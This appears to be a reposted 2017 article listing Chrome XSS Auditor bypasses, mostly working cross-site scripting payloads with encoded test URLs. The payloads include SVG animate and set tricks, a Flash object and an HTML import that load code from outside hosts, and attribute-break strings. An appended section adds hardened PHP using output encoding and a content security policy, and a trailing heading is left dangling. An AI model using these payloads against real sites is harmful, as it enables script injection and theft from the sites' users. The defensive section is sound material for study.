
Browser Security / Chrome XSS Auditor bypass

Published: 2017-08-18 13:47 | Source: Internet | Author: Anonymous
Universal Bypass 5

Latest Chrome 60

context = null

test

http://mhz.pw/game/xss/xss.php?xss=%3c%62%72%3e%00%00%00%00%00%00%00%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e

Bypass 4 (requires user interaction)

chrome 60

?c=<svg><animate href=#x attributeName=href values= javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>

// or

?c=<svg width=10000px height=10000px><a><rect width=10000px height=10000px z-index=9999999 /><animate attributeName=href values=javascript:alert(1)>

test

http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Canimate%20href%3D%23x%20attributeName%3Dhref%20values%3D%26%23x3000%3Bjavascript%3Aalert%281%29%20%2F%3E%3Ca%20id%3Dx%3E%3Crect%20width%3D100%20height%3D100%20%2F%3E%3C%2Fa%3E

http://mhz.pw/game/xss/xss.php?xss=%3Csvg%20width%3D10000px%20height%3D10000px%3E%3Ca%3E%3Crect%20width%3D10000px%20height%3D10000px%20z-index%3D9999999%20%2F%3E%3Canimate%20attributeName%3Dhref%20values%3Djavas%26%2399ript%3Aalert%281%29%3E

Bypass 3 via flash

Works on any Chrome version that supports Flash (up to Chrome 56).

context = support flash

<object allowscriptaccess=always> <param name=url value=http://mhz.pw/game/xss/alert.swf>

test

http://mhz.pw/game/xss/xss.php?xss=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=http%3A%2F%2Fmhz.pw%2Fgame%2Fxss%2Falert.swf%3E

Universal Bypass 2

Works up to Chrome 55/56, with no preconditions: the code executes as long as the input is output in the page.

context = null

?xss=<svg><set href=#script attributeName=href to=data:,alert(document.domain) /><script id=script src=foo></script>

test

http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cset%20href%3D%23script%20attributeName%3Dhref%20to%3Ddata%3A%2Calert(document.domain)%20%2F%3E%3Cscript%20id%3Dscript%20src%3Dfoo%3E%3C%2Fscript%3E

Universal Bypass 1

Works up to Chrome 55/56, with no preconditions: the code executes as long as the input is output in the page.

context = null

?xss=

test

http://mhz.pw/game/xss/xss.php?xss=%3Clink%20rel%3D%22import%22%20href%3D%22https%3Awww.leavesongs.com%2Ftestxss%22

Chrome 59 && the output point is followed by a space

context:

header('X-XSS-Protection: 1; mode=block');

echo "{$_GET['html']} ";

test

http://mhz.pw/game/xss/xss2.php?html=%3Cscript%3Ealert%28%29%3C/script

Chrome 44/45 + output inside an attribute

https://code.google.com/p/chromium/issues/detail?id=526104

chrome 45+ fixed

context:

<html>
<head>
<title>XSSAuditor bypass</title>
</head>
<body>
<form>
<input type="text" value="input=foo'?>">
</form>
</body>
</html>

payload:

"><script>prompt(/XSS/);1%02<script</script>

test

http://mhz.pw/game/xss/attr.php?xss=%22%3E%3Cscript%3Eprompt(%2FXSS%2F)%3B1%2502%3Cscript%3C%2Fscript%3E
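
Hardened forms of the two server-side contexts shown above (the body reflection in xss2.php and the attribute reflection in attr.php), as an added example that is not part of the original article. The helper names h() and param() are hypothetical; the parameter names html and xss are taken from the test URLs. The point is that the reflection is fixed by output encoding and a script policy on the server, not by the X-XSS-Protection header.

```php
<?php
declare(strict_types=1);
// Added example (not from the original page): the two reflection points
// from the article, rewritten so the reflected value is always inert text.

/** Encode untrusted text for an HTML body or a quoted attribute value. */
function h(string $s): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
    // ENT_SUBSTITUTE replaces invalid byte sequences instead of returning "".
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Read a query parameter as a string; array-valued input (?x[]=1) is dropped. */
function param(string $name): string
{
    $v = $_GET[$name] ?? '';
    return is_string($v) ? $v : '';
}

// An explicit charset stops the browser from guessing the page encoding.
header('Content-Type: text/html; charset=utf-8');
// Policy backstop: no inline script, no plugins, no <base> rewriting,
// even if an encoding step is missed somewhere else in the application.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'");
header('X-Content-Type-Options: nosniff');

$html  = h(param('html'));  // body context, as in xss2.php
$input = h(param('xss'));   // attribute context, as in attr.php
?>
<!doctype html>
<html>
<head><title>XSSAuditor bypass</title></head>
<body>
<p><?= $html ?></p>
<form>
<!-- The attribute value is always quoted; h() encodes the quote characters. -->
<input type="text" value="<?= $input ?>">
</form>
</body>
</html>
```

With this in place, every payload listed on this page is rendered as literal text, because `<`, `>`, `"` and `'` never reach the HTML parser unencoded.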

No-charset bypass